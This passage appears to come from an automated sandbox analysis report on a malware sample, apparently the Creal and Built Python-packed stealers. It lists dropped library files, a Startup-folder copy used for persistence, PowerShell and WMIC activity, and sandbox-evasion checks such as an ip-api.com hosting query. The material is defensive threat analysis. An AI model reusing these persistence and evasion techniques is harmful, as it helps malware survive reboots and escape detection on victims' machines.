              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ocb.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Math\_modexp.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\sqlite3.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ofb.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_ed25519.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_curve448.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_decimal.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ecb.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\cryptography\hazmat\bindings\_rust.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA1.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_BLAKE2s.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ctr.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_cfb.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_bz2.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_aes.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_aesni.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_multiprocessing.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_lzma.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_multiprocessing.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Protocol\_scrypt.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_des.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\sqlite3.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_curve25519.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_asyncio.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_ctypes.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA384.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_curve25519.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\unicodedata.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_MD5.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_cast.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_ssl.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA256.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\select.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\VCRUNTIME140_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_ec_ws.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ed448.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_arc2.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_Salsa20.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_MD2.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_asyncio.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_uuid.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA384.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_wmi.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_ghash_portable.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA1.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Util\_cpuid_c.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ecb.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\unicodedata.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA224.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_ghash_portable.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_cffi_backend.cp313-win_amd64.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_RIPEMD160.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeFile created: C:\Users\user\Desktop\Creal.exeJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_MD4.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ctr.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA256.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\python312.dllJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27602\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_MD5.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_cbc.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_ed448.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ec_ws.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA224.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\VCRUNTIME140_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA512.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_BLAKE2s.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\_bz2.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_des.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_RIPEMD160.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_MD2.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txtJump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42362\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt

              Boot Survival

              Source: C:\Users\user\Desktop\Creal.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\Creal.exe Code function: 2_2_00007FF6D92476C0 GetProcAddress, GetLastError (this call pair repeats throughout the function)
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
              Source: C:\Users\user\Desktop\Built.exe Code function: 4_2_00007FFD935D8816 sgdt fword ptr [rax] 4_2_00007FFD935D8816
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7877
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1614
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7802
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1683
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_cffi_backend.cp313-win_amd64.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_ARC4.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\pyexpat.pyd
              Source: C:\Users\user\Desktop\Built.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\unicodedata.pyd
              Source: C:\Users\user\Desktop\Built.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_queue.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_lzma.pyd
              Source: C:\Users\user\Desktop\Built.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_lzma.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_keccak.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_blowfish.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_des3.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_poly1305.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\python313.dll
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Util\_strxor.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA512.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_Salsa20.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_eksblowfish.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_wmi.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_BLAKE2b.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\pyexpat.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_blowfish.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_uuid.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_chacha20.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_cbc.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Util\_strxor.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_poly1305.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_keccak.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_socket.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_overlapped.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_decimal.pyd
              Source: C:\Users\user\Desktop\Built.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_socket.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\python313.dll
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_curve448.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_queue.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Protocol\_scrypt.pyd
              Source: C:\Users\user\Desktop\Built.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_hashlib.pyd
              Source: C:\Users\user\Desktop\Built.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\select.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_pkcs1_decode.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_ghash_clmul.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_socket.pyd
              Source: C:\Users\user\Desktop\Built.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_bz2.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_MD4.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Math\_modexp.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ofb.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Util\_cpuid_c.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_chacha20.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_cfb.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_des3.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\cryptography\hazmat\bindings\_rust.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ed25519.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ocb.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_ARC4.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_aes.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_aesni.pyd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_cast.pyd
              Source: C:\Users\user\Desktop\Creal.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_eksblowfish.pyd
